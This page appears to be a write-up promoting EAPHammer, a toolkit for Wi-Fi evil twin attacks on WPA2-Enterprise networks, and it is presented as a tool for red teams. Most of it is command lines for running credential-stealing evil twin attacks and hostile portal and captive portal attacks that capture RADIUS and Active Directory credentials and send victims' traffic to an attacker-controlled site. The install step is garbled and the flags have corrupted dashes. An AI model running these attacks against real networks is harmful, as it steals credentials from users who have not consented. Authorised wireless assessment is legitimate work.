Wi-Fi Evil Twin Attacks

EAPHammer is a toolkit for performing targeted Wi-Fi evil twin attacks against WPA2-Enterprise networks.

It is designed to be used in full scope wireless assessments and red team engagements. As such, the focus is placed on providing an easy-to-use interface that can be leveraged to execute powerful wireless attacks with minimal manual configuration.

Also Read:  Wireless Penetration Testing Checklist – A Detailed Cheat Sheet

To illustrate how fast this tool is, here’s an example of how to setup and execute a credential-stealing evil twin attack against a WPA2-TTLS network in just two commands:

# generate certificates

./eaphammer –cert-wizard #

#launch attack

./eaphammer -i wlan0 –channel 4 –auth ttls –wpa 2 –essid CorpWifi –creds


On Kali Linux

git clone python


  • Wi-Fi Evil Twin Attacks to Steal RADIUS credentials from WPA-EAP and WPA2-EAP networks.
  • Perform hostile portal attacks to steal AD creds and perform indirect wireless pivots
  • Wi-Fi Evil Twin Attacks to Perform captive portal attacks
  • Built-in Responder integration
  • Support for Open networks and WPA-EAP/WPA2-EAP
  • No manual configuration necessary for most attacks.
  • No manual configuration necessary for installation and setup process

How to usage

x.509 Certificate Generation

Eaphammer provides an easy-to-use wizard for generating x.509 certificates. To launch eaphammer’s certificate wizard, just use the command shown below.

#./eaphammer –cert-wizard

Wi-Fi Evil Twin Attacks to Stealing RADIUS Credentials From EAP Networks

To steal RADIUS credentials by executing an evil twin attack against an EAP network, use the –creds flag as shown below.

#./eaphammer –bssid 1C:7E:E5:97:79:B1 –essid Example –channel 2 –interface wlan0 –auth ttls –creds

The flags shown above are self-explanatory. For more granular control over the attack, you can use the –wpa flag to specify WPA vs WPA2 and the –auth flag to specify the EAP type. Note that for cred reaping attacks, you should always specify an auth type manually since the –auth flag defaults to “open” when omitted.

#./eaphammer –bssid 00:11:22:33:44:00 –essid h4x0r –channel 4 –wpa 2 –auth ttls –interface wlan0 –creds

The –hostile-portal flag can be used to execute a hostile portal attack, as shown in the examples below.

#./eaphammer –interface wlan0 –bssid 1C:7E:E5:97:79:B1 –essid EvilC0rp –channel 6 –auth peap –wpa 2 –hostile-portal

#./eaphammer –interface wlan0 –essid TotallyLegit –channel 1 –auth open –hostile-portal

Also Read:  Fully Automated WiFi Attack Tool

Performing Captive Portal Attacks

To perform a captive portal attack using eaphammer, use the –captive-portal flag as shown below.

#./eaphammer –bssid 1C:7E:E5:97:79:B1 –essid HappyMealz –channel 6 –interface wlan0 –captive-portal

This will cause eaphammer to execute an evil twin attack in which the HTTP(S) traffic of all affected wireless clients are redirected to a website you control.

Eaphammer will leverage Apache2 to serve web content out of /var/www/html if used with the default Apache2 configuration. Future iterations of eaphammer will provide an integrated HTTP server and website cloner for attacks against captive portal login pages.